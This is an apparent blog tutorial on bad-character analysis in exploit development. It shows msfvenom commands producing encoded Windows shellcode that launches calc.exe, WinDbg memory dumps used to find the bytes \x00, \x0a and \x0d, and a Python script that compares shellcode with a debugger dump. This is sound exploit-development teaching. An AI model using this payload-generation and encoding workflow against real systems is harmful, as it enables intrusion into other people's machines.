One of the things I learned here is that "bad characters" can have a significant impact on the success of your shellcode.
So for this post I'm expanding my knowledge of bad character analysis.
The goal here is a payload that runs "calc.exe". First up, run msfvenom without the --bad-chars command line option:
```
root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] =
"\xd9\xc1\xd9\x74\x24\xf4\xbf\x89\xfa\x6f\xea\x5b\x33\xc9\xb1"
"\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x8d\x18\x9a\x16\x65\x5e"
"\x65\xe7\x75\x3f\xef\x02\x44\x7f\x8b\x47\xf6\x4f\xdf\x0a\xfa"
"\x24\x8d\xbe\x89\x49\x1a\xb0\x3a\xe7\x7c\xff\xbb\x54\xbc\x9e"
"\x3f\xa7\x91\x40\x7e\x68\xe4\x81\x47\x95\x05\xd3\x10\xd1\xb8"
"\xc4\x15\xaf\x00\x6e\x65\x21\x01\x93\x3d\x40\x20\x02\x36\x1b"
"\xe2\xa4\x9b\x17\xab\xbe\xf8\x12\x65\x34\xca\xe9\x74\x9c\x03"
"\x11\xda\xe1\xac\xe0\x22\x25\x0a\x1b\x51\x5f\x69\xa6\x62\xa4"
"\x10\x7c\xe6\x3f\xb2\xf7\x50\xe4\x43\xdb\x07\x6f\x4f\x90\x4c"
"\x37\x53\x27\x80\x43\x6f\xac\x27\x84\xe6\xf6\x03\x00\xa3\xad"
"\x2a\x11\x09\x03\x52\x41\xf2\xfc\xf6\x09\x1e\xe8\x8a\x53\x74"
"\xef\x19\xee\x3a\xef\x21\xf1\x6a\x98\x10\x7a\xe5\xdf\xac\xa9"
"\x42\x2f\xe7\xf0\xe2\xb8\xae\x60\xb7\xa4\x50\x5f\xfb\xd0\xd2"
"\x6a\x83\x26\xca\x1e\x86\x63\x4c\xf2\xfa\xfc\x39\xf4\xa9\xfd"
"\x6b\x97\x2c\x6e\xf7\x76\xcb\x16\x92\x86";
```
Looking at this in memory we see:
```
0:000> d 0012fd64 l dc
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 d9 c1 d9  ................
0012fd74  74 24 f4 bf 89 fa 6f ea-5b 33 c9 b1 31 31 7b 18  t$....o.[3..11{.
0012fd84  03 7b 18 83 c3 8d 18 9a-16 65 5e 65 e7 75 3f ef  .{.......e^e.u?.
0012fd94  02 44 7f 8b 47 f6 4f df-3c 07 00 00 ec fd 12 00  .D..G.O.<.......
0012fda4  52 89 49 00 74 c4 4a 00-88 fd 12 00 08 00 00 00  R.I.t.J.........
0012fdb4  00 00 aa 00 ec fd 12 00-02 00 00 00 00 00 00 00  ................
0012fdc4  00 00 00 00 00 00 00 00-5d ae 49 00 4c fe 12 00  ........].I.L...
0012fdd4  24 0a aa 00 00 00 00 00-00 00 00 00 00 00 00 00  $...............
0012fde4  4c fe 12 00 ba ca 48 00-c1 ca 48 00 dc 93 4a 00  L.....H...H...J.
0012fdf4  02 00 00 00 d0 fe 12 00-00 00 00 00 20 fe 12 00  ............ ...
0012fe04  82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00  ..H.............
0012fe14  20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00   ...........q.A.
0012fe24  48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00  H.....I.....x(..
0012fe34  00 00 00 00 00 00 00 00-00 00 00 00              ............
```
From the dump above we can already see "00" bytes, which is already a no-no. Additionally, while '\x0a' can be found in the 3rd row of the raw shellcode in the script, it is not in the memory dump: the copied bytes stop right before it (compare the 0012fd94 line with the 3rd row). At this point we have two bad characters, "\x00" and "\x0a".
Running msfvenom with the --bad-chars option gives:
```
root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] =
"\xba\xb3\x4e\x5e\xa8\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x31\x31\x50\x13\x83\xe8\xfc\x03\x50\xbc\xac\xab\x54\x2a\xb2"
"\x54\xa5\xaa\xd3\xdd\x40\x9b\xd3\xba\x01\x8b\xe3\xc9\x44\x27"
"\x8f\x9c\x7c\xbc\xfd\x08\x72\x75\x4b\x6f\xbd\x86\xe0\x53\xdc"
"\x04\xfb\x87\x3e\x35\x34\xda\x3f\x72\x29\x17\x6d\x2b\x25\x8a"
"\x82\x58\x73\x17\x28\x12\x95\x1f\xcd\xe2\x94\x0e\x40\x79\xcf"
"\x90\x62\xae\x7b\x99\x7c\xb3\x46\x53\xf6\x07\x3c\x62\xde\x56"
"\xbd\xc9\x1f\x57\x4c\x13\x67\x5f\xaf\x66\x91\x9c\x52\x71\x66"
"\xdf\x88\xf4\x7d\x47\x5a\xae\x59\x76\x8f\x29\x29\x74\x64\x3d"
"\x75\x98\x7b\x92\x0d\xa4\xf0\x15\xc2\x2d\x42\x32\xc6\x76\x10"
"\x5b\x5f\xd2\xf7\x64\xbf\xbd\xa8\xc0\xcb\x53\xbc\x78\x96\x39"
"\x43\x0e\xac\x0f\x43\x10\xaf\x3f\x2c\x21\x24\xd0\x2b\xbe\xef"
"\x95\xc4\xf4\xb2\xbf\x4c\x51\x27\x82\x10\x62\x9d\xc0\x2c\xe1"
"\x14\xb8\xca\xf9\x5c\xbd\x97\xbd\x8d\xcf\x88\x2b\xb2\x7c\xa8"
"\x79\xd1\xe3\x3a\xe1\x38\x86\xba\x80\x44";
```
Looking at the dump in memory again:
```
0:000> d 0012fd64 l dc
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 ba b3 4e  ...............N
0012fd74  5e a8 db dd d9 74 24 f4-58 2b c9 b1 31 31 50 13  ^....t$.X+..11P.
0012fd84  83 e8 fc 03 50 bc ac ab-54 2a b2 54 a5 aa d3 dd  ....P...T*.T....
0012fd94  40 9b d3 ba 01 8b e3 c9-44 27 8f 9c 7c bc fd 08  @.......D'..|...
0012fda4  72 75 4b 6f bd 86 e0 53-dc 04 fb 87 3e 35 34 da  ruKo...S....>54.
0012fdb4  3f 72 29 17 6d 2b 25 8a-82 58 73 17 28 12 95 1f  ?r).m+%..Xs.(...
0012fdc4  cd e2 94 0e 40 79 cf 90-62 ae 7b 99 7c b3 46 53  ....@y..b.{.|.FS
0012fdd4  f6 07 3c 62 de 56 bd c9-1f 57 4c 13 67 5f af 66  ..<b.V...WL.g_.f
0012fde4  91 9c 52 71 66 df 88 f4-7d 47 5a ae 59 76 8f 29  ..Rqf...}GZ.Yv.)
0012fdf4  29 74 64 3d 75 98 7b 92-00 00 00 00 20 fe 12 00  )td=u.{..... ...
0012fe04  82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00  ..H.............
0012fe14  20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00   ...........q.A.
0012fe24  48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00  H.....I.....x(..
0012fe34  00 00 00 00 00 00 00 00-00 00 00 00              ............
```
This time the "\x0d" in line 6 of the original shellcode is missing from the memory dump. Time to regenerate the shellcode, now with "\x00", "\x0a" and "\x0d" as bad characters.
```
root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a\x0d'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] =
"\xdb\xd6\xbd\x45\xe1\xbe\xfa\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x51\x03\x4b\x06\xb1\x41"
"\xb4\xf7\x41\x26\x3c\x12\x70\x66\x5a\x56\x22\x56\x28\x3a\xce"
"\x1d\x7c\xaf\x45\x53\xa9\xc0\xee\xde\x8f\xef\xef\x73\xf3\x6e"
"\x73\x8e\x20\x51\x4a\x41\x35\x90\x8b\xbc\xb4\xc0\x44\xca\x6b"
"\xf5\xe1\x86\xb7\x7e\xb9\x07\xb0\x63\x09\x29\x91\x35\x02\x70"
"\x31\xb7\xc7\x08\x78\xaf\x04\x34\x32\x44\xfe\xc2\xc5\x8c\xcf"
"\x2b\x69\xf1\xe0\xd9\x73\x35\xc6\x01\x06\x4f\x35\xbf\x11\x94"
"\x44\x1b\x97\x0f\xee\xe8\x0f\xf4\x0f\x3c\xc9\x7f\x03\x89\x9d"
"\xd8\x07\x0c\x71\x53\x33\x85\x74\xb4\xb2\xdd\x52\x10\x9f\x86"
"\xfb\x01\x45\x68\x03\x51\x26\xd5\xa1\x19\xca\x02\xd8\x43\x80"
"\xd5\x6e\xfe\xe6\xd6\x70\x01\x56\xbf\x41\x8a\x39\xb8\x5d\x59"
"\x7e\x36\x14\xc0\xd6\xdf\xf1\x90\x6b\x82\x01\x4f\xaf\xbb\x81"
"\x7a\x4f\x38\x99\x0e\x4a\x04\x1d\xe2\x26\x15\xc8\x04\x95\x16"
"\xd9\x66\x78\x85\x81\x46\x1f\x2d\x23\x97";
```
Looking at the memory dump:
```
0:000> d 0012fd64 l ef
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 db d6 bd  ................
0012fd74  45 e1 be fa d9 74 24 f4-58 2b c9 b1 31 83 e8 fc  E....t$.X+..1...
0012fd84  31 68 14 03 68 51 03 4b-06 b1 41 b4 f7 41 26 3c  1h..hQ.K..A..A&<
0012fd94  12 70 66 5a 56 22 56 28-3a ce 1d 7c af 45 53 a9  .pfZV"V(:..|.ES.
0012fda4  c0 ee de 8f ef ef 73 f3-6e 73 8e 20 51 4a 41 35  ......s.ns. QJA5
0012fdb4  90 8b bc b4 c0 44 ca 6b-f5 e1 86 b7 7e b9 07 b0  .....D.k....~...
0012fdc4  63 20 29 91 35 02 70 31-b7 c7 08 78 af 04 34 32  c ).5.p1...x..42
0012fdd4  44 fe c2 c5 8c cf 2b 69-f1 e0 d9 73 35 c6 01 06  D.....+i...s5...
0012fde4  4f 35 bf 11 94 44 1b 97-0f ee e8 0f f4 0f 3c c9  O5...D........<.
0012fdf4  7f 03 89 9d d8 07 0c 71-53 33 85 74 b4 b2 dd 52  .......qS3.t...R
0012fe04  10 9f 86 fb 01 45 68 03-51 26 d5 a1 19 ca 02 d8  .....Eh.Q&......
0012fe14  43 80 d5 6e fe e6 d6 70-01 56 bf 41 8a 39 b8 5d  C..n...p.V.A.9.]
0012fe24  59 7e 36 14 c0 d6 df f1-90 6b 82 01 4f af bb 81  Y~6......k..O...
0012fe34  7a 4f 38 99 0e 4a 04 1d-e2 26 15 c8 04 95 16 d9  zO8..J...&......
0012fe44  66 78 85 81 46 1f 2d 23-97 90 90 90 90 90 90     fx..F.-#.......
```
At this point it looks like we have a clean shellcode.
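The comparison done by eye above (the raw C buffer against the WinDbg `d` listing) can be automated. The script below is an added example written for this post; it is not code from the original post or from the linked tutorial. It assumes the `d` listing format shown above (address, up to 16 hex bytes with the 8th and 9th joined by a dash, then an ASCII column) and runs on a constructed 20-byte stand-in buffer and a hand-written dump rather than the real 220-byte payload. It also goes slightly beyond the post: besides reporting where the copy was cut off (the `\x00`/`\x0a`/`\x0d` case), it flags bytes that survived in place but changed value, which a length check alone would not catch.

```python
import re

# --- Constructed sample input (not from the original post) ------------------
# A 20-byte stand-in for msfvenom's --format c output.
SHELLCODE_C = r'''
unsigned char buf[] =
"\xd9\xc1\x74\x09\x24\xf4\xbf\x0a\x89\xfa\x6f\xea\x5b\x33\xc9\xb1"
"\x31\x7b\x18\x03";
'''

# A WinDbg "d" listing written by hand to mimic the post's dumps: the target
# copied the buffer, turned \x09 into \x20, and stopped at \x0a, so the bytes
# after that point are whatever was already on the stack.
WINDBG_DUMP = '''
0:000> d 0012fd64 l 20
0012fd64  cc cc cc cc 10 01 b1 f1-90 90 90 90 90 d9 c1 74  ...............t
0012fd74  20 24 f4 bf 3c 07 00 00-ec fd 12 00 52 89 49 00   $..<.......R.I.
'''

HEX2 = re.compile(r'^[0-9a-fA-F]{2}$')


def parse_c_buf(c_text):
    """Pull the bytes out of msfvenom's --format c output (\\xNN string literals)."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', c_text))


def parse_windbg_dump(dump_text):
    """Return (base_address, bytes) from a WinDbg d/db listing.

    Only lines that start with an 8-digit hex address count. At most 16 bytes
    are taken per line, which keeps the trailing ASCII column out of the data.
    """
    base, data = None, bytearray()
    for line in dump_text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not re.fullmatch(r'[0-9a-fA-F]{8}', tokens[0]):
            continue
        if base is None:
            base = int(tokens[0], 16)
        for h in ' '.join(tokens[1:]).replace('-', ' ').split()[:16]:
            if not HEX2.match(h):
                break  # reached the ASCII column on a short line
            data.append(int(h, 16))
    return base, bytes(data)


def find_start(observed, expected):
    """Locate the copied shellcode in the dump. Progressively shorter prefixes
    are tried so that a substituted byte near the start does not defeat the search."""
    for n in range(8, 1, -1):
        pos = observed.find(expected[:n])
        if pos != -1:
            return pos
    raise ValueError("shellcode prefix not found in dump")


def compare(expected, observed, base):
    """Walk expected and observed side by side.

    A mismatch after which the next three bytes line up again is a substitution
    (e.g. \\x09 -> \\x20). A mismatch after which nothing lines up is where the
    copy was cut off; the expected byte at that offset is the bad-character suspect.
    """
    start = find_start(observed, expected)
    report = {"start": base + start, "substituted": [], "truncated_at": None,
              "truncating_byte": None, "bad_chars": set()}
    for i, exp in enumerate(expected):
        j = start + i
        if j >= len(observed):
            report["truncated_at"] = base + j  # dump ended first: inconclusive
            break
        obs = observed[j]
        if obs == exp:
            continue
        if observed[j + 1:j + 4] == expected[i + 1:i + 4]:
            report["substituted"].append((base + j, exp, obs))
            report["bad_chars"].add(exp)
        else:
            report["truncated_at"] = base + j
            report["truncating_byte"] = exp
            report["bad_chars"].add(exp)
            break
    return report


def analyse(c_text, dump_text):
    """Parse both artefacts and return the comparison report."""
    expected = parse_c_buf(c_text)
    base, observed = parse_windbg_dump(dump_text)
    return compare(expected, observed, base)


if __name__ == "__main__":
    r = analyse(SHELLCODE_C, WINDBG_DUMP)
    print(f"shellcode starts at {r['start']:08x}")
    for addr, exp, obs in r["substituted"]:
        print(f"  {addr:08x}: expected {exp:02x}, found {obs:02x} (substituted)")
    if r["truncating_byte"] is not None:
        print(f"  copy stops at {r['truncated_at']:08x}: expected {r['truncating_byte']:02x}")
    print("bad characters so far:", ", ".join(f"\\x{b:02x}" for b in sorted(r["bad_chars"])))
```

On the constructed input the report shows the copy stopping at the `\x0a` and, separately, the `\x09` arriving as `\x20`, so both go onto the `--bad-chars` list before the next regeneration. Because the dump is parsed from the address column, the same script works on output pasted straight from the debugger, which is handier than re-reading 220 bytes by eye after every msfvenom run.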
References:
http://www.primalsecurity.net/0x7-exploit-tutorial-bad-character-analysis/